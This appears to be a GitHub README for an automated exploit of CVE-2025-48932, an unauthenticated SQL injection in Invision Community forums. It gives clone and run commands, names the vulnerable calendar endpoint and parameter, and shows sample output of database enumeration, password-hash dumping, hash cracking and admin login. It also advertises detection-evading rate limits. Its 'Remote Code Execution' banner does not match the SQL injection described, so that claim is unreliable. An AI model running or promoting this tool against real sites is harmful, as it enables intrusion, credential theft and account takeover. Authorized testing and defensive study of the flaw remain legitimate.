
CVE-2025-48932 - Unauthenticated SQL injection exploit for Invision Community ≤ 4.7.20. Fully automated exploitation with database enumeration, credential dumping, admin takeover, session hijacking & multi-threading. No dependencies required. Security research tool by Sudeepa Wanigarathna
CVE-2025-48932 es una vulnerabilidad crítica de inyección SQL ciega no autenticada descubierta en Invision Community versiones ≤ 4.7.20. Este exploit permite a atacantes remotos:
$ python3 exploit.py -u https://vulnerable-site.com -v
╔══════════════════════════════════════════════════════════════════╗
║ CVE-2025-48932 - Invision Community SQL Injection ║
║ Author: Sudeepa Wanigarathna ║
║ Critical: Unauthenticated Remote Code Execution ║
╚══════════════════════════════════════════════════════════════════╝
[*] Target: https://vulnerable-site.com
[*] Performing vulnerability assessment...
[+] Target is confirmed VULNERABLE!
[*] Enumerating database information...
[+] Database Information:
Version: 10.4.32-MariaDB
User: invision@localhost
Database: invision_community
Hostname: localhost
Basedir: /usr/
Datadir: /var/lib/mysql/
[*] Enumerating databases...
[+] Found 5 databases
Found: information_schema
Found: invision_community
Found: mysql
Found: performance_schema
Found: phpmyadmin
[*] Enumerating tables in invision_community...
[+] Found 12 tables
Found: core_members
Found: core_sessions
Found: admin_members
Found: cms_categories
Found: forums_posts
...
[*] Searching for credentials...
[+] Found credential table: core_members
Credentials: admin - $2y$10$abcdefghijklmnopqrstuvwxyz...
Credentials: moderator - $2y$10$1234567890abcdefghijklmnop...
Credentials: user123 - $2y$10$qwertyuiopasdfghjklzxcvbnm...
[*] Extracting admin information...
[+] Admin Information Found:
name: admin
email: [email protected]
id: 1
password_hash: $2y$10$abcdefghijklmnopqrstuvwxyz...
[*] Attempting to crack password hash...
[+] Detected hash type: bcrypt
[+] Password cracked: Admin@2024!
[*] Attempting admin bypass...
[+] Admin login successful!
[+] Credentials: admin:Admin@2024!
[+] Exploitation complete!
[+] Report saved to invision_exploit_report_1700000000.json
{
"target": "https://vulnerable-site.com",
"timestamp": "2026-08-02T12:34:56.789Z",
"vulnerable": true,
"database": {
"version": "10.4.32-MariaDB",
"user": "invision@localhost",
"database": "invision_community",
"hostname": "localhost"
},
"databases": [
"information_schema",
"invision_community",
"mysql",
"performance_schema",
"phpmyadmin"
],
"tables": [
"core_members",
"core_sessions",
"admin_members"
],
"credentials": [
{
"username": "admin",
"password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz...",
"email": "[email protected]"
}
],
"admin_info": {
"name": "admin",
"email": "[email protected]",
"id": "1",
"password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz..."
},
"summary": {
"total_databases": 5,
"total_tables": 12,
"total_credentials": 3,
"vulnerable": true,
"successful": true
}
}
# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2025-48932-Invision-Community-SQLi-Exploit.git
cd CVE-2025-48932-Invision-Community-SQLi-Exploit
# No dependencies to install! Just run it.
# Check if target is vulnerable
python3 exploit.py -u https://example.com --check-only
# Full exploitation with verbose output
python3 exploit.py -u https://example.com -v
# With proxy (Burp Suite)
python3 exploit.py -u https://example.com -p http://127.0.0.1:8080 -v
# Save results to custom file
python3 exploit.py -u https://example.com -o results.json
# Multi-threaded extraction (faster)
python3 exploit.py -u https://example.com -t 10
# Dump all available data
python3 exploit.py -u https://example.com --dump-all
# With custom wordlist for password cracking
python3 exploit.py -u https://example.com --wordlist rockyou.txt -v
# Silent mode (no output, just report)
python3 exploit.py -u https://example.com -o silent_report.json
# Debug mode with detailed errors
python3 exploit.py -u https://example.com -v --debug
✅ No external dependencies!
✅ Pure Python standard library only!
✅ No pip install or virtual environment needed!
# Download popular wordlist
wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
/applications/calendar/modules/front/calendar/view.phpIPS\calendar\modules\front\calendar\view::search()location (entrada proporcionada por el usuario)GET /applications/calendar/modules/front/calendar/view.php?do=search&location=[SQL_INJECTION_PAYLOAD]
Esta herramienta es solo para fines EDUCATIVOS y de PRUEBAS AUTORIZADAS.
Al usar esta herramienta, usted acepta:
El acceso no autorizado a sistemas informáticos es ilegal y poco ético.
invision_exploit_report_[timestamp].json
├── target # Target URL
├── timestamp # Exploit timestamp
├── vulnerable # Vulnerability status
├── database # Database information
├── databases # List of databases
├── tables # List of tables
├── credentials # Extracted credentials
├── admin_info # Admin user information
└── summary # Exploitation summary
Problema: Se agotó el tiempo de espera de la conexión
# Solution: Increase timeout or check network
python3 exploit.py -u https://example.com --timeout 60
Problema: Errores de certificado SSL
# Solution: Disable SSL verification (not recommended for production)
python3 exploit.py -u https://example.com --no-verify-ssl
Problema: Se detectó limitación de velocidad
# Solution: Reduce threads and increase delays
python3 exploit.py -u https://example.com -t 2 --delay 2
Problema: No se encontró ningún parámetro vulnerable
# Solution: Ensure calendar app is installed and GeoLocation is enabled
# Check: /applications/calendar/modules/front/calendar/view.php exists
¡Damos la bienvenida a las contribuciones! Consulte nuestras Directrices de contribución.
git checkout -b feature/AmazingFeature)git commit -m 'Add some AmazingFeature')git push origin feature/AmazingFeature)Investigador de seguridad y cazador de bug bounty
Este proyecto está licenciado bajo la Licencia MIT; consulte el archivo LICENSE para obtener más detalles.
MIT License
Copyright (c) 2026 Sudeepa Wanigarathna
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Si este proyecto te fue útil o te pareció interesante:
Investigador de ciberseguridad | Ingeniero de software | Ingeniero de CTF
Este proyecto se proporciona para investigación de seguridad, análisis defensivo y pruebas de penetración autorizadas. Los usuarios son responsables de cumplir con todas las leyes aplicables y de obtener la autorización adecuada antes de su uso.
| Característica | Descripción | Estado |
|---|
| 🚀 Cero dependencias | Biblioteca estándar de Python puro: no se necesita pip install | ✅ |
| ⚡ Multihilo | Extracción de datos ultrarrápida con hilos configurables | ✅ |
| 🤖 Totalmente automatizado | Cadena de explotación completa, desde la detección hasta el informe | ✅ |
| 👑 Toma de control del administrador | Secuestro de sesión y escalada de privilegios | ✅ |
| 🔑 Extracción de credenciales | Extrae usuarios, hashes de contraseñas, correos electrónicos | ✅ |
| 🔓 Descifrado de contraseñas | Descifrado de hashes integrado con soporte de listas de palabras | ✅ |
| 📋 Informes JSON | Salida estructurada para análisis y documentación | ✅ |
| 🔌 Soporte de proxy | Integración con Burp Suite y proxies personalizados | ✅ |
| 🎨 Salida en color | Salida de terminal atractiva con indicadores de progreso | ✅ |
| 🛡️ Limitación de velocidad | Retrasos integrados para evitar la detección | ✅ |
| Argumento | Descripción | Ejemplo |
|---|
-u, --url | URL del objetivo (obligatorio) | -u https://example.com |
-p, --proxy | URL del proxy | -p http://127.0.0.1:8080 |
-t, --threads | Número de hilos (predeterminado: 5) | -t 10 |
-o, --output | Archivo de salida para los resultados | -o results.json |
-v, --verbose | Habilita la salida detallada | -v |
--check-only | Solo comprobar la vulnerabilidad | --check-only |
--dump-all | Volcar todos los datos disponibles | --dump-all |
--wordlist | Archivo de lista de palabras para el descifrado | --wordlist rockyou.txt |